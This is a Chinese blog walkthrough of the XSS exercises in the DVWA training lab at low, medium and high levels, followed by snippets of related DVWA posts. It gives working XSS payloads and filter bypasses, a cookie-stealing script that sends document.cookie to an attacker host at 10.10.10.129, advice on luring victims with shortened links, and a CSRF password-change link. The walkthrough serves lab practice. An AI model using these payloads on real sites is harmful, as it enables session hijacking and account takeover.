DVWA1.10-XSS

最新推荐文章于 2022-09-01 20:41:28 发布
最新推荐文章于 2022-09-01 20:41:28 发布
阅读量271 收藏
点赞数
分类专栏: Web安全 文章标签: web 安全漏洞 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39091609/article/details/107548560
版权

反射型

low

在输入框里填入的内容会通过GET请求的方式发往后端,同时后端会根据输入的内容拼接一个页面,把输入的内容显示给用户。

在输入框里输入<script>alert('xss');</script>点击提交会发现弹出弹窗。验证了漏洞存在。不过xss可不是用来给访问者弹窗的,接下来继续利用该漏洞窃取访问者的cookie。
首先编写一段xss脚本放在攻击者服务器上,其作用是读取当前的cookie和host信息,并提交到攻击者的服务器上。

//文件名为xss_cookie.js
var url = "http://10.10.10.129/xssRecv.php";#攻击者服务器处理请求的URL
new Image().src = url + "?cookie=" + encodeURI(document.cookie) + "&host=" + encodeURI(location.host);#悄悄通过GET方式传输了数据

之后通过xss漏洞让访问者的浏览器执行该脚本,在输入框里填入<script src="10.10.10.129/xss_cookie.js"></script>.这样就能执行刚刚写的脚本,悄悄的把cookie窃取。当攻击者收到cookie时就有可能直接以访问者的账号访问host网站,进而有可能更改密码或者,如果是论坛网站也可转发广告或其他不当言论,总之危害极大。

面对这种反射型xss,应该不会有人主动去输入对自己有害的xss代码,观察到URL里面使用的GET请求,那么攻击者就可以对有XSS漏洞的URL生成短链接,诱使访问者点击。

medium

尝试输入<script>alert('xss');</script>,这次并没有直接执行,通过返回的内容看到只有一个alert('xss');,由此猜测后端是过滤掉了<script></script>标签,尝试使用<Script>alert('xss');</Script>,提交可以执行,成功绕过。
也可以这么做<sc<script>ript>alert('1');</script>,同样能够绕过

high

查看后端代码$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );,显然之前那一套不灵了。
既然不能用script标签,那么就换一种思路,找其他触发js代码的方法,比如:
<img src="a.c" onerror="alert(1)"/>,输入发现成功弹窗了。

存储型

low

直接在输入框中输入<script>alert(1);</script>验证漏洞存在

medium

查看源码得知,对于message的过滤比较严格,使用了htmlspecialchars函数进行编码,不太可能注入xss代码,所以对name下手。然而name在前端有字数输入限制,最多只能输入10个字符。在开发者工具的查看器里手动修改<input name="txtName" type="text" size="30" maxlength="10">去掉后面的maxlength限制。回到输入框输入<sc<script>ript>alert(1);</scr<script>ipt>,即可绕过。

$message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

high

审计源码:

$message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

对message进行了HTML编码,对name进行了字符替换,这里不再使用

DOM型

low

分析网页前端代码可以知道,前端的js先从URL里面截取用户选中的语言,然后创建DOM节点,把用户选择的语言显示出来。
直接在URL里面构造default=<script>alert(1);</script>即可。

medium

查看源码:

if (stripos ($default, "<script") !== false) {
    header ("location: ?default=English");
    exit;
}

当输入中包含<script时就会被过滤,而且不区分大小写。所以想到了使用其他标签触发js执行,然而观察前端动态生成DOM节点的js,我们提交的内容会被写到<option></option>标签的属性和标签内部,如果想用<img>标签来触发的话,必须闭合掉<option>标签,另外还需要闭合掉<select>标签,因为只有在闭合了这个标签以后才能写其他标签,也就是需要用来触发js的<img>标签,构造如下:
default='>Chinese</option></select><img src=1 onerror="alert(1);"/>

high

审计后端代码:

# White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }

这里对提交的数据进行了严格的检查,如果不是预设的四个值就返回默认。然而实际上后端收到的参数与我们实际输入的值有时是不同的。
如果我们构造default=French #<script>alert(1);</script>然后提交,通过抓包发现实际上提交到后端的只有default=French,这样一来既可以绕过后端的验证,又可以在前端加上js代码。

DVWA1.10_CSRF
whime
07-11 390
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.
DVWA靶机通关系列--1.Brute Force(暴力破解)(解题思路+审计分析)
ElsonHY的博客
11-29 1058
DVWA靶机通关系列--1.Brute Force(暴力破解)(解题思路+审计分析)前言0x01 Brute Force(暴力破解)CLASS:LOWCLASS:MEDIUMCLASS:HIGHCLASS:IMPOSSIBLE 前言 最近在复习一些基础的常见web漏洞,经典的靶机大家肯定最先想到的就是DVWA了,我用的是1.10版本,目前里面的题型包括了14个专题板块,题目难度也分为低(low)中(medium)高(high)和不可能(impossible)几个等级。 Brute Force(暴力破解
DVWA-v1.10-文件包含
-
03-20 4694
DVWA v1.10搭建在linux系统上。 进来之后看到 可以看到三个文件fil1.php、file2.php、file3.php 同时还给出三个链接:
DVWA1.10】SQL Injection通关笔记
EC_Carrot的博客
12-31 482
等级Security Level: lowSecurity Level: mediumSecurity Level: highSecurity Level: impossible Security Level: low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT f
DVWA 1.10版本Brute Force(high)
monsterdouble的博客
06-25 802
low和mid等级直接使用burpsuite暴力破解,high等级先抓包发现有token认证机制,需要先获取token,然后用token加上用户密码验证身份。以下为python暴力破解代码import re import requests url='http://127.0.0.1:8000/vulnerabilities/brute/' header={'Host': '127.0.0.1:...
DVWA1.10】Reflected Cross Site Scripting (XSS)通关笔记
EC_Carrot的博客
12-31 335
难度Security Level: lowSecurity Level: mediumSecurity Level: highSecurity Level: impossible额外补充: Security Level: low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL
DVWA-文件上传模块 包括代码审计
weixin_45715461的博客
06-01 547
DVWA-文件上传模块 包括代码审计
搭建DVWA Web渗透测试靶场
热门推荐
看那白熊
01-31 1万+
搭建DVWA Web渗透测试靶场,进行Web安全测试练习
DVWA靶场过程整理
Al_1的博客
09-01 1140
暴力破解,命令注入,跨站请求伪造(不全),文件包含,文件上传,不安全的验证码,SQL注入,SQL盲注,弱会话ID(有bug),跨站脚本攻击(DOM型、反射型、存储型)
DVWA1.10_Brute_Force
whime
07-11 416
low等级 查看源代码可知,在php脚本中只检查了Login变量是否设置,没有对user,password参数进行过滤,存在注入漏洞。由于password参数进行了md5散列,并且只有结果集只有一行才可以通过验证,所以只能对用户名进行注入。如 ’ or 1=1 limit 1,1# 使用Burp Suite进行爆破,抓包选择爆破的参数,选择Kali 自带的字典rockyou.txt 进行爆破,得出密码为password。 medium等级 medium等级使用了mysqli_real_escape_s.
DVWA最新版
03-23
DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA-1.0.7
01-31
学习PHP漏洞挖掘大基友门有福了!希望大家能够使用这个平台能在漏洞挖掘方面有一定提升.
新手指南:DVWA 1.9 全级别教程 PDF
08-18
新手指南:DVWA 1.9 全级别教程 PDF格式
DVWA1.10】Brute Force通关笔记
EC_Carrot的博客
01-04 390
难度Security Level: lowSecurity Level: mediumSecurity Level: highSecurity Level: impossible Security Level: low <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'pas
DVWA1.10】File Upload通关笔记
EC_Carrot的博客
01-04 374
难度Security Level: lowSecurity Level: mediumSecurity Level: highSecurity Level: impossible Security Level: low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable
DVWA1.10-SQL注入
uh_eng的博客
07-16 436
low 字符型注入 select first_name,last_name from users where user_id='1'与select user_id from users where user_id='1asdfasdf'查询结果一致。 猜测原因应该是由于表中的user_id字段类型为int,所以在与字符串类型比较时会进行转换,与PHP类似,在转换过程中碰到非数字字符时转换终止,这就导致了上面的查询中where后面的效果相同。 获取MySQL数据库信息 如果注入类型为字符型,需要解决末尾的’闭
dvwa v1.10 文件包含high级别的一个思路
zhangzhuangtongxue的博客
07-05 1909
我们先来看一下dvwa文件包含high级别的代码:<?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation if( !fnmatch( "file*", $file ) && $file != "include.php" ) { // This isn't the page we
DVWA取消登录
whatday的专栏
03-09 3018
DVWA在渗透测试方面表现相当不错,可以自定义高中低的安全级别。测试工具需要取消登录 DVWA版本:Damn Vulnerable Web Application (DVWA) v1.10 *Development* 更改文件:\DVWA\dvwa\includes\dvwaPage.inc.php 更改代码: dvwaIsLoggedIn 函数 原始函数定义: function d
DVWA-XSS(DOM)
最新发布
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值